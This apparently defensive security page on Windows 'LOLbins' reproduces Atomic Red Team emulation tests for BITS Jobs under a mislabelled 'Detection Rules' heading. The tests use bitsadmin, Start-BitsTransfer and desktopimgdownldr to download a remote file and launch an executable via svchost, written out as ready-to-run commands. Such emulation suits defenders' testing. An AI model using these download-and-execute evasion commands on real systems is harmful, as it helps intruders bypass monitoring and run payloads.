LOLbins

Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, for files, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command-Line Interface, Run window, or via scripts.

Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.

U1004

Detection Rules

attack_technique: T1197
display_name: BITS Jobs
atomic_tests:
- name: Bitsadmin Download (cmd)
  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin1_flag.ps1'
  executor:
    command: |
      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bitsadmin Download (PowerShell)
  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload leveraging PowerShell

    Upon execution you will find a github markdown file downloaded to the Temp directory
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: $env:TEMP\bitsadmin2_flag.ps1
  executor:
    command: |
      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
    cleanup_command: |
      Remove-Item #{local_file} -ErrorAction Ignore
    name: powershell
- name: Persist, Download, & Execute
  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
  supported_platforms:
  - windows
  input_arguments:
    command_path:
      description: Path of command to execute
      type: path
      default: C:\Windows\system32\notepad.exe
    bits_job_name:
      description: Name of BITS job
      type: string
      default: AtomicBITS
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin3_flag.ps1'
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
  executor:
    command: |
      bitsadmin.exe /create #{bits_job_name}
      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
      bitsadmin.exe /resume #{bits_job_name}
      timeout 5
      bitsadmin.exe /complete #{bits_job_name}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bits download using destktopimgdownldr.exe (cmd)
  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
  description: |
    This test simulates using destopimgdwnldr.exe to download a malicious file
    instead of a desktop or lockscreen background img. The process that actually makes 
    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    download_path:
      description: Local file path to save downloaded file
      type: path
      default: 'SYSTEMROOT=C:\Windows\Temp'
    cleanup_path:
      description: path to delete file as part of cleanup_command
      type: path
      default: C:\Windows\Temp\Personalization\LockScreenImage
    cleanup_file:
      description: file to remove as part of cleanup_command
      type: string
      default: "*.md"
  executor:
    command: |
      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
    cleanup_command: |
      del #{cleanup_path}\#{cleanup_file} >null 2>&1
    name: command_prompt

Additional Resources

Subscribe to our Newsletter and don't miss important updates